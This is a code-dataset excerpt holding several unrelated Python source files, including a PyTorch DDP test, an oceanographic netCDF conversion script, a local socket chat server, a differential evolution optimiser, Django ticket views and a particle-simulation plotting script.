model_name='generator',\n name='update_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 6, 12, 16, 2, 44, 649888, tzinfo=utc), verbose_name=b'last updated'),\n ),\n ]\n","sub_path":"Generator/generators/migrations/0005_auto_20150612_1602.py","file_name":"0005_auto_20150612_1602.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"99640043","text":"import torch\nimport torch.distributed as dist\nfrom torch.nn import Parameter\nfrom torch.nn import Module\nfrom apex.parallel import DistributedDataParallel as DDP\nimport argparse\n\n\nparser = argparse.ArgumentParser(description='allreduce hook example')\nparser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,\n help='url used to set up distributed training')\nparser.add_argument('--dist-backend', default='nccl', type=str,\n help='distributed backend')\nparser.add_argument('--world-size', default=1, type=int,\n help='Number of GPUs to use. Can either be manually set ' +\n 'or automatically set by using \\'python -m multiproc\\'.')\nparser.add_argument('--rank', default=0, type=int,\n help='Used for multi-process training. 
Can either be manually set ' +\n 'or automatically set by using \\'python -m multiproc\\'.')\n\nargs = parser.parse_args()\n\nargs.distributed = args.world_size > 1\n\nif args.distributed:\n torch.cuda.set_device(args.rank % torch.cuda.device_count())\n dist.init_process_group(args.dist_backend, init_method=args.dist_url,\n world_size=args.world_size)\n rank = torch.distributed.get_rank()\ntorch.set_printoptions(precision=10)\n\nclass Model(Module):\n def __init__(self):\n super(Model, self).__init__()\n self.x = Parameter(torch.cuda.FloatTensor(1,4096*4096).fill_(1.0))\n def forward(self, input):\n return self.x*input\nmodel = DDP(Model(), message_size=1)\n\nz = torch.cuda.FloatTensor(4096*4096)\n\nfor i in range(10):\n z.fill_(i + rank) # fill z with new values every iteration for sanity\n model.zero_grad()\n out = model(z)\n loss = out.sum()\n torch.cuda.nvtx.range_push(\"backward\")\n loss.backward()\n torch.cuda.nvtx.range_pop()\n \n torch.cuda.nvtx.range_push(\"synchronize() + sum\")\n torch.cuda.synchronize()\n for param in model.parameters():\n print(\"i = {},\\n\"\n \"param.grad.data_ptr() = {}\\n\"\n \"expected {},\\n\" \n \" got {}\\n\"\n .format(i,\n param.grad.data_ptr(),\n 4096*4096*(2.*i+1)/2.,\n param.grad.data.sum().item()))\n torch.cuda.nvtx.range_pop()\n\n","sub_path":"tests/distributed/ddp_race_condition_test.py","file_name":"ddp_race_condition_test.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"479874087","text":"import os\nimport sys\nimport glob\nfrom multiprocessing import Process\nfrom time import time\nimport cioos_data_transform.IosObsFile as ios\nfrom write_ctd_ncfile import write_ctd_ncfile\nfrom write_cur_ncfile import write_cur_ncfile\nfrom write_mctd_ncfile import write_mctd_ncfile\n\n# .cioos_data_transform as iod\nimport cioos_data_transform.utils as cioos_utils\nimport subprocess\n\n\ndef convert_files(env_vars, opt=\"all\", ftype=None):\n # path of raw files, path for nc files, and option\n # opt = 'new' for only new raw files\n # opt = 'all' for all files. 
default value;\n # ftype = 'ctd' for CTD profiles\n # 'mctd' for mooring CTDs\n # 'cur' for current meters\n print(\"Option, ftype =\", opt, ftype)\n if ftype == \"ctd\":\n in_path = env_vars[\"ctd_raw_folder\"]\n out_path = env_vars[\"ctd_nc_folder\"]\n fgeo = env_vars[\"geojson_file\"]\n flist = glob.glob(in_path + \"**/*.[Cc][Tt][Dd]\", recursive=True)\n elif ftype == \"mctd\":\n in_path = env_vars[\"mctd_raw_folder\"]\n out_path = env_vars[\"mctd_nc_folder\"]\n fgeo = env_vars[\"geojson_file\"]\n flist = []\n flist.extend(glob.glob(in_path + \"**/*.[Cc][Tt][Dd]\", recursive=True))\n flist.extend(glob.glob(in_path + \"**/*.mctd\", recursive=True))\n elif ftype == \"bot\":\n in_path = env_vars[\"bot_raw_folder\"]\n out_path = env_vars[\"bot_nc_folder\"]\n fgeo = env_vars[\"geojson_file\"]\n flist = []\n flist.extend(glob.glob(in_path + \"**/*.[Bb][Oo][Tt]\", recursive=True))\n flist.extend(glob.glob(in_path + \"**/*.[Cc][Hh][Ee]\", recursive=True))\n elif ftype == \"cur\":\n in_path = env_vars[\"cur_raw_folder\"]\n out_path = env_vars[\"cur_nc_folder\"]\n fgeo = env_vars[\"geojson_file\"]\n flist = glob.glob(in_path + \"**/*.[Cc][Uu][Rr]\", recursive=True)\n else:\n print(\"ERROR: Filetype not understood ...\")\n return None\n print(\"Total number of files =\", len(flist))\n # loop through files in list, read the data and write netcdf file if data read is successful\n for i, fname in enumerate(flist[:]):\n # print('\\nProcessing -> {} {}'.format(i, fname))\n p = Process(\n target=(convert_files_threads), args=(ftype, fname, fgeo, out_path)\n )\n p.start()\n p.join()\n return flist\n\n\ndef standardize_variable_names(ncfile):\n # input: netcdf file with non-standard variable names\n # output: netcdf file with standard variables added\n # NOTE: netcdf files are overwritten\n print(f\"Adding standard variables:{ncfile}\")\n cioos_utils.add_standard_variables(ncfile)\n\n\ndef convert_files_threads(ftype, fname, fgeo, out_path):\n # skip processing file if its older than 24 hours old\n if cioos_utils.file_mod_time(fname) < -24.0 and opt == \"new\":\n # print(\"Not converting file: \", fname)\n return 0\n print(\"Processing {} {}\".format(ftype, fname))\n # read file based on file type\n if ftype == \"ctd\":\n fdata = ios.CtdFile(filename=fname, debug=False)\n elif ftype == \"mctd\":\n fdata = ios.MCtdFile(filename=fname, debug=False)\n elif ftype == \"bot\":\n fdata = ios.CtdFile(filename=fname, debug=False)\n elif ftype == \"cur\":\n fdata = ios.CurFile(filename=fname, debug=False)\n else:\n print(\"Filetype not understood!\")\n sys.exit()\n # if file class was created properly, try to import data\n if fdata.import_data():\n print(\"Imported data successfully!\")\n fdata.assign_geo_code(fgeo)\n # now try to write the file...\n yy = fdata.start_date[0:4]\n if not os.path.exists(out_path + yy):\n os.mkdir(out_path + yy)\n ncFileName = out_path + yy + \"/\" + fname.split(\"/\")[-1] + \".nc\"\n if ftype == \"ctd\":\n try:\n write_ctd_ncfile(ncFileName, fdata)\n standardize_variable_names(ncFileName)\n except Exception as e:\n print(\"Error: Unable to create netcdf file:\", fname, e)\n subprocess.call([\"rm\", \"-f\", ncFileName])\n elif ftype == \"mctd\":\n try:\n write_mctd_ncfile(ncFileName, fdata)\n standardize_variable_names(ncFileName)\n except Exception as e:\n print(\"Error: Unable to create netcdf file:\", fname, e)\n subprocess.call([\"rm\", \"-f\", ncFileName])\n elif ftype == \"bot\":\n try:\n write_ctd_ncfile(ncFileName, fdata)\n standardize_variable_names(ncFileName)\n except 
Exception as e:\n print(\"Error: Unable to create netcdf file:\", fname, e)\n subprocess.call([\"rm\", \"-f\", ncFileName])\n elif ftype == \"cur\":\n try:\n write_cur_ncfile(ncFileName, fdata)\n except Exception as e:\n print(\"Error: Unable to create netcdf file:\", fname, e)\n subprocess.call([\"rm\", \"-f\", ncFileName])\n else:\n print(\"Error: Unable to import data from file\", fname)\n return 0\n\n\n# read inputs if any from the command line\n# first input is 'all' or 'new' for processing all files or just files newer than 24 hours\n# second input is file type and is one of ['ctd','mctd', 'cur', 'bot']\nif len(sys.argv) > 1:\n opt = sys.argv[1].strip().lower()\n ftype = sys.argv[2].strip().lower()\nelse: # default option. process all files !\n opt = \"all\"\n ftype = \"ctd\"\nconfig = cioos_utils.read_config(\"config.json\")\n# env_vars = iod.import_env_variables(\"./.env\")\nprint(\"Inputs from .env file: \", config)\n\nstart = time()\nflist = convert_files(env_vars=config, opt=opt, ftype=ftype)\nprint(\"Time taken to convert files: {:0.2f}\".format(time() - start))\n# if any raw files have been removed, delete corresponding netCDF files\nif flist is not None:\n print(\"Checking if any netCDF files should be removed...\")\n ncfilelist = glob.glob(\n config[ftype + \"_nc_folder\"] + \"**/*.nc\", recursive=True\n )\n for i, e in enumerate(\n cioos_utils.compare_file_list(sub_set=flist, global_set=ncfilelist)\n ):\n filename = glob.glob(config[ftype + \"_nc_folder\"] + \"**/{}.nc\")\n print(\"deleting file:\", e)\n subprocess.call([\"rm\", \"-f\", e])\nprint(\"Total time taken:{:0.2f}\".format(time() - start))\n","sub_path":"projects/ios_data_transform/ios_data_transform_script.py","file_name":"ios_data_transform_script.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"394294348","text":"import socket\nhost = \"127.0.0.1\"\nport = 12345\nss = socket.socket()\nss.bind((host, port))\nss.listen()\ncs, addr = ss.accept()\nprint(f\"Connection from: {str(addr)}\")\nwhile True:\n data = cs.recv(1024).decode()\n if not data:\n break\n print(f\"from connected user: {str(data)}\")\n print(f\"received from user: {str(data)}\")\n data = input(\"type message: \")\n cs.send(data.encode())\ncs.close()","sub_path":"networking/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"361682762","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom sdk import UcloudApiClient\nimport config\nfrom pprint import pprint\nimport sys\n\n\ndef get_metric(region, resource_type, resource_id, metric_name,\n timerange=1 * 60 * 60):\n \"\"\"Get UCloud monitor data\n Region: \"cn-east-01\"|\"cn-north-01\"|\"cn-south-01\"|\"hk-01\"|\"cn-north-02\"\n East China, Beijing BGP-A, South China, Hong Kong, Beijing BGP-B\n ResourceType: 'uhost'|'udb'|'umem'|'ulb'\n MetricName:\n uhost:\n 'NetworkIn'\n 'NetworkOut'\n 'CPUUtilization'\n 'IORead'\n 'IOWrite'\n 'DiskReadOps'\n 'DiskWriteOps'\n 'NICIn'\n 'NICOut'\n 'MemUsage'\n 'DataSpaceUsage'\n 'RootSpaceUsage'\n 'ReadonlyDiskCount'\n 'RunnableProcessCount'\n 'BlockProcessCount'\n udb:\n 'CPUUtilization'\n 'MemUsage'\n 'QPS'\n 'ExpensiveQuery'\n\n ulb:\n 'NetworkOut'\n 'CurrentConnections'\n\n umem:\n 'Usage'\n 'QPS'\n 'InstanceCount'\n\n \"\"\"\n api_client = UcloudApiClient(config.base_url, config.public_key,\n config.private_key)\n\n params = {}\n params['Region'] = region\n params['Action'] = 'GetMetric'\n params['ResourceType'] = resource_type\n params['ResourceID'] = resource_id\n params['MetricName'] = metric_name\n params['TimeRange'] = timerange\n response = api_client.get(\"/\", params)\n pprint(response)\n\n\nif __name__ == '__main__':\n # get_metric('cn-east-01', 'uhost', 'uhost-ezsffw', 'NetworkOut')\n usage = \"%s Region ResourceType ResourceID MetricName [TimeRange]\\n\" % (sys.argv[0])\n argc = len(sys.argv)\n if argc < 5:\n sys.stderr.write(usage)\n sys.exit(1)\n region = sys.argv[1]\n resource_type = sys.argv[2]\n resource_id = sys.argv[3]\n metric_name = sys.argv[4]\n if argc == 6:\n timerange = sys.argv[5]\n get_metric(region, resource_type, resource_id, metric_name, timerange)\n else:\n get_metric(region, resource_type, resource_id, metric_name)\n","sub_path":"get_metric.py","file_name":"get_metric.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"410455585","text":"import sys\n#sys.argv.append('dell:8');\n#sys.argv.append('toshiba:2');\n#sys.argv.append('dell:2');\n#sys.argv.append('hp:14');\n#arr = sys.argv[1]\n#arr = ['','dell:8', 'toshiba:9', 'acer:5']\nstro = ''\nflag = False\nn=1\ndict = []\n\nwhile n < len(sys.argv):\n x = sys.argv[n]\n o = x.split(':')\n existe = False\n for temp in dict:\n if temp[0] == o[0]:\n existe = True\n temp[1] = temp[1] + int(o[1])\n if not existe:\n dict.append([o[0],int(o[1])])\n #stro += ('\\n-'+o[0]+': '+('*'*int(o[1]))) if flag else ('-'+o[0]+': '+('*'*int(o[1])))\n #flag = True\n n += 1\n\ns = False\n\nl2 = []\nfor x in dict:\n if l2 == []:\n l2.append(x)\n else:\n n = 0\n ins = False\n while n < len(l2):\n if x[1] > l2[n][1]:\n l2.insert(n,x)\n ins = True\n break\n n += 1\n if not ins:\n l2.append(x)\ndict = l2\n\nfor o in dict:\n stro += ('\\n-'+o[0]+': '+('*'*o[1])) if flag else ('-'+o[0]+': '+('*'*o[1]))\n flag = True\nprint (stro)\n","sub_path":"Eliminatoria/barras.py","file_name":"barras.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"549344588","text":"#!/usr/bin/env python3\n\nimport cv2\nimport numpy as np\nimport time\n\n\nclass Scanner:\n def __init__(self):\n pass\n \n def scan(self, ip):\n if ip == \"cam\":\n # use the webcam to constantly capture frames and \n # look for and scan any SQR codes found\n cap = cv2.VideoCapture(\"http://192.168.31.42:8080/video\")\n cv2.namedWindow(\"original cam feed\")\n cv2.moveWindow(\"original cam feed\", 20, 20)\n cv2.namedWindow(\"processed cam feed\")\n cv2.moveWindow(\"processed cam feed\", 20, 600)\n while cap.isOpened():\n ret, self.frame = cap.read()\n if not ret or self.frame is None:\n break\n\n cv2.imshow(\"original cam feed\", self.frame)\n self._scan()\n\n cv2.imshow(\"processed cam feed\", self.frame)\n resp = cv2.waitKey(1) & 0xFF\n if resp == ord('q'):\n break\n elif resp == ord('p'):\n while True:\n if cv2.waitKey(1) & 0xFF == ord('p'):\n break\n print(\"Terminated\")\n\n else:\n # scan the single input image given as the input\n self.frame = cv2.imread(ip)\n if self.frame is None:\n print(\"Error while opening the image\")\n else:\n self._scan()\n\n def _scan(self):\n start = time.time()\n IMAGE_HEIGHT = 240\n\n frame = self.frame \n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.resize(frame, (int(len(frame[0]) / len(frame) * IMAGE_HEIGHT), IMAGE_HEIGHT))\n frame = cv2.adaptiveThreshold(frame, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 23, 2)\n \n \n\n self.frame = frame\n\n 
print(\"Frame took {} milliseconds.\".format((time.time() - start) * 1000))\n","sub_path":"SQRScanner.py","file_name":"SQRScanner.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"522272798","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\n\ntry:\n from numpy import array\n from numpy import argmin\n from numpy import delete\n from numpy import eye\n from numpy import min\n from numpy import newaxis\n from numpy import reshape\n from numpy import tile\n from numpy import where\n from numpy import zeros\n from numpy.random import choice\n from numpy.random import rand\n\n from scipy.optimize import fmin_l_bfgs_b\n\nexcept ImportError:\n if 'ironpython' not in sys.version.lower():\n raise\n\nfrom time import time\n\nimport json\n\n\n__author__ = ['Andrew Liew ']\n__copyright__ = 'Copyright 2017, BLOCK Research Group - ETH Zurich'\n__license__ = 'MIT License'\n__email__ = 'liew@arch.ethz.ch'\n\n\n__all__ = [\n 'devo_numpy'\n]\n\n\ndef devo_numpy(fn, bounds, population, generations, limit=0, results=None, vectored=False, F=0.8, CR=0.9, polish=False,\n args=(), callback=None, **kwargs):\n \"\"\"Call the Differential Evolution solver.\n\n Parameters\n ----------\n fn : obj\n The function to evaluate and minimise.\n bounds : list\n Lower and upper bounds for each DoF [[lb, ub], ...].\n population : int\n Number of agents in the population.\n generations : int\n Number of cross-over cycles/steps to perform.\n limit : float\n Value of the objective function for which to terminate optimisation.\n results : str\n Where to store results files.\n vectored : bool\n Vectored function output.\n F : float\n Differential evolution parameter.\n CR : float\n Differential evolution cross-over ratio parameter.\n polish : bool\n Polish the final result with L-BFGS-B.\n args : seq\n Sequence of optional arguments to pass to fn.\n callback : obj\n Callback function for each generation.\n\n Returns\n -------\n float\n Optimal value of objective function.\n list\n Values that give the optimum (minimised) function.\n\n Notes\n -----\n fn must return vectorised output for input (k, population) if vectored is True.\n\n \"\"\"\n tic = time()\n\n # Heading\n\n print('\\n' + '-' * 50)\n print('Differential Evolution started')\n print('-' * 50)\n\n # Setup bounds\n\n k = len(bounds)\n bounds = array(bounds)\n b_max = bounds[:, 1][:, newaxis]\n b_min = bounds[:, 0][:, newaxis]\n lb = tile(b_min, (1, population))\n ub = tile(b_max, (1, population))\n\n # Setup population\n\n agents = (rand(k, population) * (ub - lb) + lb)\n candidates = tile(array(range(population)), (1, population))\n candidates = reshape(delete(candidates, where(eye(population).ravel() == 1)), (population, population - 1))\n\n # Initial conditions\n\n if vectored:\n f = fn(agents, *args)\n else:\n f = zeros(population)\n for i in range(population):\n f[i] = fn(agents[:, i], *args)\n fopt = min(f)\n\n ac = zeros((k, population))\n bc = zeros((k, population))\n cc = zeros((k, population))\n\n ts = 0\n print('\\nGeneration: {0} fopt: {1:.5g}'.format(ts, fopt))\n\n # Start evolution\n\n while ts < generations + 1:\n\n if callback:\n callback(ts, f, **kwargs)\n\n for i in range(population):\n inds = candidates[i, choice(population - 1, 3, replace=False)]\n ac[:, i] = agents[:, inds[0]]\n bc[:, i] = agents[:, inds[1]]\n cc[:, i] = agents[:, inds[2]]\n\n ind = rand(k, population) < 
CR\n agents_ = ind * (ac + F * (bc - cc)) + ~ind * agents\n log_lb = agents_ < lb\n log_ub = agents_ > ub\n agents_[log_lb] = lb[log_lb]\n agents_[log_ub] = ub[log_ub]\n\n if vectored:\n f_ = fn(agents_, *args)\n else:\n f_ = zeros(population)\n for i in range(population):\n f_[i] = fn(agents_[:, i], *args)\n\n log = where((f - f_) > 0)[0]\n agents[:, log] = agents_[:, log]\n f[log] = f_[log]\n fopt = min(f)\n xopt = agents[:, argmin(f)]\n\n ts += 1\n ac *= 0\n bc *= 0\n cc *= 0\n\n if fopt < limit:\n break\n\n print('Generation: {0} fopt: {1:.5g}'.format(ts, fopt))\n\n # Save generation\n\n if results:\n\n fnm = '{0}generation_{1:0>5}_population.pop'.format(results, ts - 1)\n with open(fnm, 'w') as f:\n\n f.write('Generation\\n')\n f.write('{0}\\n\\n'.format(ts - 1))\n\n f.write('Number of individuals per generation\\n')\n f.write('{0}\\n\\n'.format(population))\n\n f.write('Population scaled variables\\n')\n for i in range(population):\n entry = [str(i)] + [str(j) for j in list(agents[:, i])]\n f.write(', '.join(entry) + '\\n')\n\n f.write('\\nPopulation fitness value\\n')\n for i in range(population):\n f.write('{0}, {1}\\n'.format(i, f[i]))\n\n f.write('\\n')\n\n # L-BFGS-B polish\n\n if polish:\n opt = fmin_l_bfgs_b(fn, xopt, args=args, approx_grad=1, bounds=bounds, iprint=1, pgtol=10**(-6), factr=10000,\n maxfun=10**5, maxiter=10**5, maxls=100)\n xopt = opt[0]\n fopt = opt[1]\n\n # Save parameters\n\n if results:\n\n parameters = {\n 'num_pop': population,\n 'min_fit': limit,\n 'fit_type': 'min',\n 'end_gen': ts - 1,\n 'num_gen': generations - 1,\n 'start_from_gen': 0}\n\n with open('{0}parameters.json'.format(results), 'w+') as fp:\n json.dump(parameters, fp)\n\n # Summary\n\n print('\\n' + '-' * 50)\n print('Differential Evolution finished : {0:.4g} s'.format(time() - tic))\n print('fopt: {0:.3g}'.format(fopt))\n print('-' * 50)\n\n return fopt, list(xopt)\n\n\n# ==============================================================================\n# Main\n# ==============================================================================\n\nif __name__ == \"__main__\":\n\n from compas.plotters.evoplotter import EvoPlotter\n\n def fn(u, *args):\n # Booth's function, fopt=0, uopt=(1, 3)\n x = u[0]\n y = u[1]\n z = (x + 2 * y - 7)**2 + (2 * x + y - 5)**2\n return z\n\n def callback(ts, f, evoplotter):\n evoplotter.update_points(generation=ts, values=f)\n evoplotter.update_lines(generation=ts, values=f)\n\n evoplotter = EvoPlotter(generations=50, fmax=30, xaxis_div=25, yaxis_div=10, pointsize=0.1)\n\n bounds = [(-10, 10), (-15, 15)]\n devo_numpy(fn, bounds, population=20, generations=50, polish=False, callback=callback, evoplotter=evoplotter)\n","sub_path":"src/compas/numerical/solvers/devo_numpy.py","file_name":"devo_numpy.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"47762941","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\nfrom .models import Ticket\nfrom .forms import TicketForm\nfrom .filter import TicketFilter\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom comments.forms import CommentForm\nfrom comments.models import Comment\nfrom django.core.paginator import Paginator\n\ndef get_tickets(request):\n \"\"\"\n Create a view that will return a list\n of Tickets that were published prior to 'now'\n and render them to the 'tickets.html' template\n \"\"\"\n f = 
TicketFilter(request.GET, queryset=Ticket.objects.all().order_by('-published_date').exclude(payment_status='Not Paid'))\n paginator = Paginator(f.qs, 20)\n \n page = request.GET.get('page')\n page_obj = paginator.get_page(page)\n return render(request, 'tickets.html', {'filter': f, 'page_obj': page_obj})\n \n # return render(request, \"tickets.html\", {'filter': f})\n \ndef ticket_detail(request, pk):\n \"\"\"\n Create a view that returns a single\n Ticket object based on the post ID (pk) or if Type=\"Issue\" and\n render it to the 'ticketdetail.html' template. If Type=\"Feature\"\n render it to the 'ticketpayment.html'.\n Or return a 404 error if the ticket is\n not found\n And allowed users to leave the comments.\n \"\"\"\n ticket = get_object_or_404(Ticket, pk=pk)\n comments = ticket.comments.all()\n paginator = Paginator(comments, 25)\n \n if request.method == 'POST':\n comment_form = CommentForm(data=request.POST)\n if comment_form.is_valid():\n if request.user.is_authenticated:\n comment = comment_form.save(commit=False)\n comment.comment_on = ticket\n comment.comment_author = request.user\n comment.save()\n return redirect('ticket_detail', pk=ticket.pk)\n else:\n messages.success(request, \n \"You have to be logged in to leave a comments.\")\n return redirect('login')\n else:\n comment_form = CommentForm()\n\n \n page = request.GET.get('page')\n page_obj = paginator.get_page(page)\n return render(request, \"ticketdetail.html\", {\n 'ticket': ticket,\n 'comments': comments,\n 'comment_form': comment_form,\n 'page_obj': page_obj,\n })\n\n@login_required() \ndef ticket_prepayment(request, pk):\n \"\"\"\n Create a view that returns a single\n Ticket object based on the post ID (pk) \n render it to the 'cart.html'.\n Or return a 404 error if the ticket is\n not found\n \"\"\"\n ticket = get_object_or_404(Ticket, pk=pk)\n return render(request, \"prepayment.html\", {'ticket': ticket})\n \n@login_required()\ndef create_or_edit_ticket(request, pk=None):\n \"\"\"\n Create a view that allows us to create\n or edit a ticket depending if the Ticket ID\n is null or not\n \"\"\"\n ticket = get_object_or_404(Ticket, pk=pk) if pk else None\n if request.method == \"POST\":\n form = TicketForm(request.POST, instance=ticket)\n if form.is_valid():\n ticket = form.save(commit=False)\n if str(ticket.ticket_type) == \"Issue\":\n ticket.author = request.user\n ticket.save()\n return redirect(ticket_detail, ticket.pk)\n else:\n ticket.author = request.user\n ticket.payment_status = 'Not Paid'\n ticket.save()\n return redirect('ticket_prepayment', pk=ticket.pk)\n else:\n form = TicketForm(instance=ticket)\n return render(request, 'ticketform.html', {'form': form, 'ticket': ticket})","sub_path":"tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"30781931","text":"import matplotlib.ticker as ticker\nimport matplotlib.tri as tri\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport h5py\nimport os\nimport shutil\nimport matplotlib as mpl\nmpl.use('Agg')\n# Shut down console graphic display\n\nresultpath = '/root/msys_sandbox/'\nnewpath = resultpath + 'Buislopemiden/'\nresultstart = 'buislopemiden_'\nos.mkdir(newpath)\nos.mkdir(newpath + 'Position/')\nos.mkdir(newpath + 'Deformation/')\nos.mkdir(newpath + 'Deformation/pics/')\nos.mkdir(newpath + 'Deformation/video/')\nos.mkdir(newpath + 'Strain/')\nos.mkdir(newpath + 'Strain/' + 'pics/')\nos.mkdir(newpath + 'Strain/' + 
'video/')\n\nfilePath = resultpath\nfor i in os.listdir(filePath):\n if i.startswith(resultstart):\n if i.endswith('.h5'):\n synpo = i.index('_')\n ii = i[synpo + 1]\n if ii.isnumeric():\n shutil.copy2(os.path.join(filePath, i), newpath)\n# Copy corresponding h5 files to new folder\n\nfin = h5py.File(resultpath+resultstart+'Initial.h5', mode='r')\niniSPHposition = fin.get('Position')\ndsp = len(iniSPHposition)\nrowsp = int(dsp/3)\niniSPHposition = np.array(iniSPHposition).reshape(rowsp, 3)\nnp.savetxt(newpath+'iniSPHposition.txt', iniSPHposition)\n# Plot setting start\nX = iniSPHposition[:, 0]\nX = X.flatten()\nY = iniSPHposition[:, 1]\nY = Y.flatten()\ntriang = tri.Triangulation(X, Y)\n\niniDEMposition = fin.get('DEMPosition')\ndp = len(iniDEMposition)\nrowdp = int(dp/3)\niniDEMposition = np.array(iniDEMposition).reshape(rowdp, 3)\nnp.savetxt(newpath+'iniDEMposition.txt', iniDEMposition)\ndexin = np.min(iniDEMposition[:, 0])\ndexinmax = np.max(iniDEMposition[:, 0])\ndeyin = np.min(iniDEMposition[:, 1])\ndeyinmax = np.max(iniDEMposition[:, 1])\ndezin = np.min(iniDEMposition[:, 2])\nfnn = (deyinmax-deyin)/(dexinmax-dexin)\n# Plot setting end\n\n# Max and min strain\nfilePath = newpath\nstmax = 1*1e-10\nstmin = 1*1e-10\nfor i in os.listdir(filePath):\n if i.endswith('.h5'):\n f = h5py.File(os.path.join(filePath, i), mode='r')\n SPHstrain = f.get('Strain')\n # For 2D simulation, 6 elements for each particle.\n # For 3D simulation, 9 elements for each particle.\n dst = len(SPHstrain)\n rowst = int(dst/6)\n SPHstrain = np.array(SPHstrain).reshape(rowst, 6)\n SPHstring = 0.5*(SPHstrain[:, 0]+SPHstrain[:, 4])\n fstmax = np.max(SPHstring)\n fstmin = np.min(SPHstring)\n if fstmax > stmax:\n stmax = fstmax\n if fstmin < stmin:\n stmin = fstmin\n\n# Final step for plotting\nfilePath = newpath\nfor i in os.listdir(filePath):\n if i.endswith('.h5'):\n f = h5py.File(os.path.join(filePath, i), mode='r')\n SPHstrain = f.get('Strain')\n # For 2D simulation, 6 elements for each particle.\n # For 3D simulation, 9 elements for each particle.\n dst = len(SPHstrain)\n rowst = int(dst/6)\n SPHstrain = np.array(SPHstrain).reshape(rowst, 6)\n # read, reshape and save SPH particles strain data\n\n SPHposition = f.get('Position')\n sp = len(SPHposition)\n rowsp = int(sp/3)\n SPHposition = np.array(SPHposition).reshape(rowsp, 3)\n # read, reshape and save SPH particles position data\n\n DEMposition = f.get('DEMPosition')\n dp = len(DEMposition)\n rowdp = int(dp/3)\n DEMposition = np.array(DEMposition).reshape(rowdp, 3)\n dexm = DEMposition[1, 0]\n deym = DEMposition[0, 1]\n dezm = 0\n # read, reshape and save DEM particles position data\n\n deltm = np.ones((rowsp, 3))\n deltm[:, 0] = deltm[:, 0]*dexm\n deltm[:, 1] = deltm[:, 1]*deym\n deltm[:, 2] = deltm[:, 2]*dezm\n # create a new array to save the DEM axis limits\n\n AA = np.zeros((rowsp, 3))\n AA[:, 0] = SPHposition[:, 0] - deltm[:, 0]\n AA[:, 1] = SPHposition[:, 1] - deltm[:, 1]\n AA[:, 2] = SPHposition[:, 2] - deltm[:, 2]\n # record the position of SPH particles relative to the DEM axis limits\n\n# =============================================================================\n# Please do not delete\n# name = filename+'.txt'\n# namesp = filename.lstrip(resultstart)+'.txt'\n# np.savetxt(filePath+'Strain/'+name,SPHstrain)\n# np.savetxt(filePath+'Position/'+namesp,SPHposition)\n# =============================================================================\n\n filename = i.rstrip('h5')\n filename = filename.rstrip('.')\n # Note: pictures should be named by number so that other\n # functions can read the picture files in the correct order.\n # ===== Strain Contour Plotting\n name = filename+'.npy'\n namesp = filename.lstrip(resultstart)+'.npy'\n np.save(filePath+'Strain/'+name, SPHstrain)\n np.save(filePath+'Position/'+namesp, SPHposition)\n np.save(filePath+'Deformation/'+namesp, AA)\n # Strain Plot start\n Z = 0.5*SPHstrain[:, 0]+0.5*SPHstrain[:, 4]\n # 0.5*(Epsilon11 + 22) for 2D\n Z = Z.flatten()\n # Z :accumulated deviatoric strain\n fig1, ax1 = plt.subplots(\n constrained_layout=True, figsize=(3.5, 3.5), dpi=300)\n # ax1 = plt.figure(figsize=(7,7*fnn),dpi=300)\n ax1.set_aspect('equal')\n ax1.set_title('SPH particle number = ' + str(rowsp) +\n ' Step = '+filename.lstrip(resultstart), fontsize=8)\n tt = ax1.tricontourf(triang, Z, cmap=\"jet\",\n levels=np.linspace(stmin, stmax, 100))\n plt.xticks(np.linspace(0, 0.9, 10), fontsize=8)\n plt.yticks(np.linspace(0, 0.5, 6), fontsize=8)\n plt.xlabel('Distance', fontsize=8)\n plt.ylabel('Elevation', fontsize=8)\n cb = fig1.colorbar(tt, orientation='horizontal', fraction=0.1)\n ticker_locator = ticker.MaxNLocator(nbins=5)\n cb.locator = ticker_locator\n cb.set_ticks([stmin, 0.25*(stmin+stmax), 0.5 *\n (stmin+stmax), 0.75*(stmin+stmax), stmax])\n cb.ax.tick_params(labelsize=8)\n cb.update_ticks()\n filename = filename.lstrip(resultstart)\n plt.savefig(newpath+'Strain/'+'pics/'+filename+'.png')\n # ===== Strain Plot end\n\n picPath = newpath + 'Deformation/pics/'\n plt.subplots(constrained_layout=True)\n x = AA[:, 0]\n y = AA[:, 1]\n plt.figure(figsize=(7, 7*fnn), dpi=300)\n # plot setting, unit inch\n plt.axis([0, dexinmax-dexin, 0, deyinmax-dexin])\n # axis setting\n plt.title('SPH particle number = ' + str(rowsp) +\n ' Step = '+filename, fontsize=8)\n plt.xlabel('Distance')\n plt.ylabel('Elevation')\n plt.scatter(x, y, s=1.0)\n plt.savefig(picPath+filename+'.png')\n # jpg format couldn't be applied 